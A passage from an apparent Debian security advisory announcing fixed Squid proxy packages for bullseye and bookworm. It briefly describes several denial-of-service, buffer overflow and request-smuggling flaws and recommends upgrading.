                 CVE-2023-49286 CVE-2023-50269 CVE-2024-23638 CVE-2024-25617  
                 CVE-2023-46848 CVE-2024-25111  
Debian Bug     : 1055252 1054537 1055250 1055251 1058721

Several security vulnerabilities have been discovered in Squid, a full featured  
web proxy cache. Due to programming errors in Squid's HTTP request parsing,  
remote attackers may be able to execute a denial of service attack by sending  
large X-Forwarded-For header or trigger a stack buffer overflow while  
performing HTTP Digest authentication. Other issues facilitate request  
smuggling past a firewall or a denial of service against Squid's Helper process  
management.

In regard to CVE-2023-46728: Please note that support for the Gopher protocol  
has simply been removed in future Squid versions. There are no plans by the  
upstream developers of Squid to fix this issue. We recommend to reject all  
Gopher URL requests instead.

For the oldstable distribution (bullseye), these problems have been fixed  
in version 4.13-10+deb11u3.

For the stable distribution (bookworm), these problems have been fixed in  
version 5.7-2+deb12u1.

We recommend that you upgrade your squid packages.

For the detailed security status of squid please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/squid

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEErPPQiO8y7e9qGoNf2a0UuVE7UeQFAmXrHBNfFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEFD  
RjNEMDg4RUYzMkVERUY2QTFBODM1RkQ5QUQxNEI5NTEzQjUxRTQACgkQ2a0UuVE7  
UeSFng/+JAY5jG6Z/fVFf2M9SsqFhQm8mGT1CgOx39dYirUkdpcFOyADqWopwv+q  
tci90QFuhnreW1DmO1GYRlZro+37iRjiryRKxETpUB1AnpPWs6RnyAA+mrqssDqg  
PxxFkqpJFtpMhZU3VkDDbTkkvK2T0Hwjdn8TND6qA+B56exwW2DEZlm5aqCPiWRf  
pdzPZTOZJEV2fT4UPWduiIN1l94VsLktfZY5Ox0/HmrdkAWJJFXQhj3wZPcbFLbB  
leQ7Nkq6mpuw98UxOSa7hsE0crPm6ctrf7AYMx+qojtWJFcbFE+mUqzcf0aFYp0L  
EfTSVAOVEXvbFytlX/oSWYE5GrZtTrnwProiXFJT7WvDYN2Mbqxgp/jB3jZygmrZ  
rknvF84haHX16ZMXRlBDOlx1E3XSCB+/xRynwbGQe8RPzSRlOKuiFqn+qr3qCtOd  
5Ua2+ZJXDpEP4aUseFb94FwJRfs9onBS+EYPt2xwcxcBGUiMJ/lY9Fj9p5MjQ1bZ  
nCXuRNo2ao6qumLSraK2qPle7AucbuOtiMDsMFi6rGu3H0RVlk7oWGFO4rMRAcvX  
IBYU2bWBIyi7J4IvJd+07QfNgofPvcld9XN7/LDgizmMZpCorpPq39Ta24y7U3e5  
Zv+ye/kOYKuD0ij7M7jkT2hgxq6kKdlSEZbZ/wrlkSILrcjgwqw=  
=qmZY  
-----END PGP SIGNATURE-----

Tag

#web